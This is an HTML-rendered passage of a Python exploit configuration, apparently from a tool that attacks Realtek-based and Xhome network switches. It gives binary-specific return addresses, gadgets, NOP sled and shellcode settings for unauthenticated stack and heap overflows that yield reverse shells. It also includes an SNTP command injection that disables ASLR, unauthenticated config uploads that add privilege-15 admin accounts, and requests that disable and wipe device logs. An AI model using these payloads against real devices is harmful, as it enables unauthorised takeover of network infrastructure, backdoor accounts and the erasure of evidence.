						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=+&amp;sp=123'</span><span class="token punctuation">,</span>				<span class="token comment"># CMD</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sn=1'</span><span class="token punctuation">,</span>	<span class="token comment"># Enable CMD</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sn=0'</span><span class="token punctuation">,</span>	<span class="token comment"># Disable CMD</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/conf_tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token comment">#</span>
					<span class="token comment"># Used for both 'heap' and 'stack'</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?logout'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'build=NOP&amp;heap=NOP&amp;to=NOP&amp;higher=addresses&amp;usr=admin&amp;pswrd=_PWDNOP_RA_START&amp;shellcode=_USRNOP_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'Xhome'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'Xhome'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'clear'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=USERNAME&amp;password=PASSWORD&amp;login=1'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=547'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'LOGGING_SERVICE=0&amp;cmd=5121'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_5132=Clear+file+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_5132=Clear+buffered+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'httpuploadbakcfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "backup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadbakcfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpuploadruncfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "running-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httprestorecfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "startup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httprestorecfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpupload.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Image Signature Error'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'dispatcher.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username=admin&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">184</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;login=1'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'md5'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span> 
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=524&amp;usrName=USERNAME'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=1&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=+&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=0&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#
</span></code></pre>
<div class="wrapper">
<div class="main-panel ps-container ps-theme-default ps-active-y" data-ps-id="dd13f15b-1faa-eee8-11f8-6ab614585dcf">
<div class="content">
<div class="row">
<div class="col-md-12">
<div class="card">
<div class="card-body">
<div class="code-toolbar">
<pre class=" language-py"><code class=" language-py">						<span class="token string">'address'</span><span class="token punctuation">:</span><span class="token number">0x436D9C</span><span class="token punctuation">,</span>				<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'account'</span><span class="token punctuation">:</span><span class="token string">'&amp;usrName=USERNAME&amp;usrPrivType=15&amp;usrPriv=15'</span><span class="token punctuation">,</span>			<span class="token comment"># Admin, priv 15</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_localUserDel_post()</span>
						<span class="token string">'address'</span><span class="token punctuation">:</span><span class="token number">0x437124</span><span class="token punctuation">,</span>				<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'account'</span><span class="token punctuation">:</span><span class="token string">'&amp;_del=1'</span><span class="token punctuation">,</span>			<span class="token comment"># First additional user in the list</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># user</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x47D760</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_delete_post()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x480804</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_delete_post()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x480804</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x43BA8C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x43BA8C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x43AF54</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'dispatcher.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; main()</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">100</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_RA_START&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">59</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;STARTUP_BACKUP=1'</span><span class="token operator">+</span> <span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token string">'&amp;'</span> <span class="token operator">+</span> struct<span class="token punctuation">.</span>pack<span class="token punctuation">(</span><span class="token string">'&gt;L'</span><span class="token punctuation">,</span><span class="token number">0x2404FF3D</span><span class="token punctuation">)</span> <span class="token operator">+</span> struct<span class="token punctuation">.</span>pack<span class="token punctuation">(</span><span class="token string">'&gt;L'</span><span class="token punctuation">,</span><span class="token number">0x2404FFFF</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">*</span> <span class="token number">70</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;'</span> <span class="token operator">+</span> struct<span class="token punctuation">.</span>pack<span class="token punctuation">(</span><span class="token string">'&gt;L'</span><span class="token punctuation">,</span><span class="token number">0x2404FF3D</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x10010104</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span> <span class="token number">0x104006A0</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">25</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">15</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># Realtek</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : No</span>
			<span class="token comment"># Del /mntlog/flash.log  : No</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'222-40570'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Realtek'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'3.0.0.43126'</span><span class="token punctuation">,</span>				<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'RTL8380-24GE-4GEC'</span><span class="token punctuation">,</span>			<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.realtek.com/en/products/communications-network-ics/item/rtl8381m-vb-cg-2'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E6DC</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99851c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system) # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x24841ea8</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
